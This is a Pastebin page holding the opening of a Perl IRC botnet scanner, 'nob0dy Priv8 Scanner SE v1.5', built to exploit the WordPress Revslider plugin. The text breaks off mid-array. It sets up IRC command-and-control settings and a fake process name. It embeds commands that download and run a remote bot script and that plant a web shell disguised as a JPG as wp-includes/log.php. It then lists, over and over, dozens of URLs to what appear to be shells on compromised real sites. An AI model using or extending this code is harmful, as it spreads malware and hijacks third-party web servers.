Guest User

Untitled

a guest
Aug 16th, 2016
538
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 217.45 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. # nob0dy Priv8 Scanner SE v1.5
  4. # Coded by nob0dy
  5. # Last Edited: Sep 16 2011
  6.  
  7. # How to use:
  8. # perl nob0dy.pl irc.server.net 6667 nick ident chan admin /usr/sbin/fakeproc
  9. # or perl filename
  10.  
  11. use HTTP::Request;
  12. use HTTP::Request::Common;
  13. use HTTP::Request::Common qw(POST);
  14. use LWP::Simple;
  15. use LWP 5.64;
  16. use LWP::UserAgent;
  17. use IO::Socket;
  18. use IO::Socket::INET;
  19. use IO::Select;
  20. use Socket;
  21. use MIME::Base64;
  22. use File::Basename;
  23. use URI::Escape;
  24. use Digest::MD5 qw(md5_hex);
  25. use DBI;
  26.  
  27.  
  28. my $datetime = localtime;
  29. my $fakeproc = "fuckyou";
  30. my $ircserver = "irc.yourserver.com";
  31. my $ircport = "6667";
  32. my $number = int(rand(100));
  33. my $nickname = "revs[".$number."]";
  34. my $ident = "rev";
  35. my $channel = "#yourchannel";
  36. my $admin = "adminnick";
  37. my $fullname = "nob0dy Priv8 Scanner SE v1.5";
  38. my $nob0dy = "nob0dy Priv8 Scanner SE v1.5";
  39.  
  40. my $searchlogo = "15(7@2Search15)";
  41. my $rsqllogo = "15(7@12DB-Rev15)";
  42. my $revlogo = "15(7@12Revslider15)";
  43. my $revcmd = "!rev".$number;
  44. #my $chkcmd = "!chk".$number;
  45. my $plugin = "revslider";
  46. my $action = "revslider_ajax_action";
  47. my $update_file = "revslider.zip";
  48. my $pubscan = 0;
  49. my $spread = 1;
  50. my $botxx = uri_escape("curl -C - -O http://www.viverosgimeno.es/wp-content/rac/bss.txt;perl bss.txt;rm bss.t*");
  51. my $c99 = uri_escape("curl -C - -O http://www.viverosgimeno.es/wp-content/rac/untitled.jpg;mv untitled.jpg ../../../../../../wp-includes/log.php;");
  52.  
  53. sub randomagent {
  54. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  55. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  56. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  57. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  58. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  59. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31');
  60. my $random = $array[rand @array];
  61. return($random);
  62. }
  63. my $useragent = randomagent();
  64.  
  65. my $uagent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6';
  66. #my $jpath = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  67. my @randombarner1 = ("http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://viewwebinars.com/wp-includes/errors.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://iidh-jurisprudencia.ac.cr/bibliote/images/stories/error.php");
  68.  
  69. my @randombarner2 = ("http://glowform.com/wp-content/uploads/config.inc.php","http://s195003287.online.de/Platz/administrator/templates/index2.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://cmssa.com.br//php/error.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.lesyro.cz//images/stories/errors.php");
  70.  
  71. my @randombarner3 = ("http://www.an-tc.ru/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.wtpolytech.com/th/includes/config.index.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://cmssa.com.br//php/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://iidh-jurisprudencia.ac.cr/bibliote/images/stories/error.php");
  72.  
  73. my @randombarner4 = ("http://s195003287.online.de/Platz/administrator/templates/index2.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://www.muliaperkasaabadi.com/images/stories/errors.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php");
  74.  
  75. my @randombarner5 = ("http://www.mdcsystems.com/plugins/content/config.inc.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://s195003287.online.de/Platz/administrator/templates/index2.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://cmssa.com.br//php/error.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://iidh-jurisprudencia.ac.cr/bibliote/images/stories/error.php");
  76.  
  77. my @randombarner6 = ("http://glowform.com/wp-content/uploads/config.inc.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.voileenligne.com/audio/komo.php","http://209.188.87.82/error.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.wtpolytech.com/th/includes/config.index.php");
  78.  
  79. my @randombarner7 = ("http://www.lesyro.cz//images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://s195003287.online.de/Platz/administrator/templates/index2.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://s195003287.online.de/Platz/administrator/templates/index2.php","http://www.lesyro.cz//images/stories/errors.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.lesyro.cz//images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://www.remedyhospital.com.tr/eng//images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://iidh-jurisprudencia.ac.cr/bibliote/images/stories/error.php");
  80.  
  81. my @randombarner8 = ("http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.muliaperkasaabadi.com/images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.corpetrol.edu.co/corpetrol//images/stories/error.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://glowform.com/wp-content/uploads/config.inc.php","http://www.allsocool.com.au/php/error.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://glowform.com/wp-content/uploads/config.inc.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://iidh-jurisprudencia.ac.cr/bibliote/images/stories/error.php");
  82.  
  83. my @randombarner9 = ("http://viewwebinars.com/wp-includes/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://www.lesyro.cz//images/stories/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.accidentresolution.com/blogspot/images/stories/error/error.php","http://cmssa.com.br//php/error.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://fonio.hu/ajiu/bp.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://barbecue.by/display.by/plugins/content/config.inc.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.bam.co.th/bam/corporate/xmlrpc/index2.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://iidh-jurisprudencia.ac.cr/bibliote/images/stories/error.php");
  84.  
  85. my @randombarner10 = ("http://www.remedyhospital.com.tr/eng//images/stories/errors.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.harmonywaters.us/administrator/components/com_maian15/charts/tmp-upload-images/komo/komo.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://viewwebinars.com/wp-includes/errors.php","http://www.druhupalem.cz/images/stories/errors.php","http://www.linuxcompany.nl/modules/mod_login/error.php","http://inter-projekt.waw.pl/images/stories/error//error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://ronde-en-couleurs.com/wp-includes/error.php","http://www.voileenligne.com/audio/komo.php","http://www.mdcsystems.com/plugins/content/config.inc.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.auptitnidlorrain.fr/images/errors.php","http://www.organum.fr/images/errors.php","http://www.sibtruckservice.ru/images/errors.php","http://unhas.ac.id/farmasi/lama/images/stories/errors.php","http://motoarena.ru/images/stories/errors.php","http://www.mlmia.com//images/stories/search.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.gingerteastudio.com//wp-content/uploads/components/search.php","http://kavkazinterpress.ru/plugins/content/config.inc.php","http://www.planville.com.br/plugins/search/config.index.php","http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php","http://apritalia.it/css/config.inc.php","http://europump.com.pl/images/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://hd.schoevers.com//logs/seka.php","http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php","http://www.allsocool.com.au/php/error.php","http://www.wtpolytech.com/th/includes/config.index.php","http://liftoffconsulting.ca/wp-includes/errors.php","http://www.campenauktioner.dk//administrator/components/com_users/error.php","http://www.schirrhein.fr/error.php","http://mbuz-bcrb.ru/includes/js/calendar/lang/error.php","http://www.an-tc.ru/images/stories/errors.php","http://viewwebinars.com/wp-includes/errors.php","http://www.mdc